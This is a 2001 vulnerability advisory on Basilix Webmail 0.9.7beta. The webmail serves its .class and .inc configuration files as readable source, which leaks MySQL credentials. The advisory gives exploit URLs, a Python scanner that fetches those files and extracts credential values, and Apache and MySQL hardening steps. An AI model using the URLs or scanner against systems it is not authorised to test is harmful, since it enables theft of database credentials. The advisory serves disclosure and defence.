
Title: Basilix Webmail System Permission Vulnerability
Released by: tamersahin.net
Date: 12th January 2001
---------------------------------------------------

tamersahin.net Security Solutions Announcement

---------------------------------------------------

 

Basilix Webmail System *.class *.inc Permission Vulnerability

 

 

Release Date:

January 12, 2001

 



Version Affected:

Basilix Webmail System 0.9.7beta

 



Description:

There is a simple mistake in the Basilix Webmail System. Its configuration and library files use the .class and .inc extensions. If those extensions are not mapped to the PHP handler in httpd.conf, the web server does not execute the files but serves their source verbatim, so any attacker can read very valuable information simply by entering the URL:

 

http://victim.host/mysql.class

 

The MySQL username and password are stored in this file.

 



Example Exploit:

 

http:///class/mysql.class

 

http:///inc/sendmail.inc (likewise settings.inc and the other .inc files)
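To turn the two URLs above into a repeatable check, here is an added example scanner (not code from the advisory or from Basilix). It requests the paths the advisory names, decides whether the response is raw PHP source rather than the output of an executed script, and pulls out credential-looking assignments. The base URL, the fake responses and the variable names in the constructed sample file are assumptions; a real mysql.class may name its variables differently.

```python
"""Check whether a Basilix install serves its PHP source files verbatim.

Added example; not part of the advisory or of Basilix. The base URL, the
fake responses and the credential variable names are assumptions.
"""
import re
from typing import Callable, Dict, Optional
from urllib.error import URLError
from urllib.request import urlopen

# Relative paths named in the advisory for Basilix 0.9.7beta.
BASILIX_PATHS = ("class/mysql.class", "inc/sendmail.inc", "inc/settings.inc")

# Constructed stand-in for a leaked mysql.class (not the real Basilix file).
SAMPLE_LEAK = b"""<?php
class MySQL {
    var $host = "localhost";
    var $user = "basilix";
    var $pass = "s3cret";
    var $dbname = "basilix";
}
?>
"""

# Constructed response from a server that refuses to serve the file.
SAMPLE_SAFE = b"<html><body><h1>Forbidden</h1></body></html>"

# A PHP file handed to the interpreter never echoes its own opening tag,
# so '<?php' (or short-open '<?') together with a '$' variable in the
# body is a reliable sign that the raw source came back.
PHP_OPEN_RE = re.compile(r"<\?(?:php\b|=|\s)")

# Assignment of a quoted literal to a variable whose name suggests a
# credential, e.g.  var $pass = "s3cret";  or  $db_user = 'x';
CRED_RE = re.compile(
    r"\$(\w*(?:user|pass|passwd|password|host|db\w*))\s*=\s*['\"]([^'\"]*)['\"]",
    re.IGNORECASE,
)


def looks_like_php_source(body: bytes) -> bool:
    text = body.decode("latin-1", "replace")
    return bool(PHP_OPEN_RE.search(text)) and "$" in text


def extract_credentials(body: bytes) -> Dict[str, str]:
    """Return {variable_name: value} for credential-looking assignments."""
    text = body.decode("latin-1", "replace")
    return {name: value for name, value in CRED_RE.findall(text)}


def http_fetch(url: str, timeout: float = 5.0) -> Optional[bytes]:
    """Plain GET; None on any network/HTTP error so one 404 does not stop the scan."""
    try:
        with urlopen(url, timeout=timeout) as resp:
            return resp.read()
    except (URLError, OSError):
        return None


def scan(base_url: str,
         paths=BASILIX_PATHS,
         fetch: Callable[[str], Optional[bytes]] = http_fetch) -> Dict[str, Dict[str, str]]:
    """Return {url: credentials} for each path whose raw PHP source is served."""
    findings = {}
    for path in paths:
        url = base_url.rstrip("/") + "/" + path
        body = fetch(url)
        if body and looks_like_php_source(body):
            findings[url] = extract_credentials(body)
    return findings


if __name__ == "__main__":
    # Offline demo against the constructed responses; leave fetch at its
    # default (http_fetch) to test a host you are authorised to assess.
    fake = lambda url: SAMPLE_LEAK if url.endswith("mysql.class") else SAMPLE_SAFE
    for url, creds in scan("http://victim.host", fetch=fake).items():
        print(url, creds)
```

A server that handles .class correctly returns either an empty body (the class definition produces no output) or an error page, and neither contains a PHP opening tag, which is why the check keys on the tag rather than on HTTP status alone.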

 



Solutions:

The .class and .inc extensions should be mapped to the PHP handler so they are executed rather than served, and the files should additionally be denied to web clients (or moved outside the document root) so they cannot be read from outside even if the handler mapping is lost. The MySQL port should also be filtered from remote connections, since a leaked username and password are only useful to a remote attacker if the database accepts network logins.
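As an added example of the httpd.conf change (not taken from the advisory or from the Basilix distribution), the weak mapping is shown beside the corrected one. Paths and the Apache 1.3-style access-control syntax are assumptions about the affected installation.

```apache
# Weak: only .php goes to the PHP module, so /class/mysql.class and
# /inc/settings.inc are served as plain text.
AddType application/x-httpd-php .php

# Fix 1: hand the extensions Basilix uses to the PHP module as well.
AddType application/x-httpd-php .php .class .inc

# Fix 2 (belt and braces): never serve these files directly. Scripts that
# include() them read from disk, not over HTTP, so the application still works.
<FilesMatch "\.(class|inc)$">
    Order allow,deny
    Deny from all
</FilesMatch>
```

On Apache 2.4 the two access-control lines become `Require all denied`. For the database side, `skip-networking` in my.cnf (MySQL on the same host) or a packet filter on tcp/3306 keeps a disclosed password from being usable remotely.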

Regards,



Tamer Sahin

http://www.tamersahin.net

feedback@tamersahin.net 



"Every blow that doesn't kill me makes me stronger."









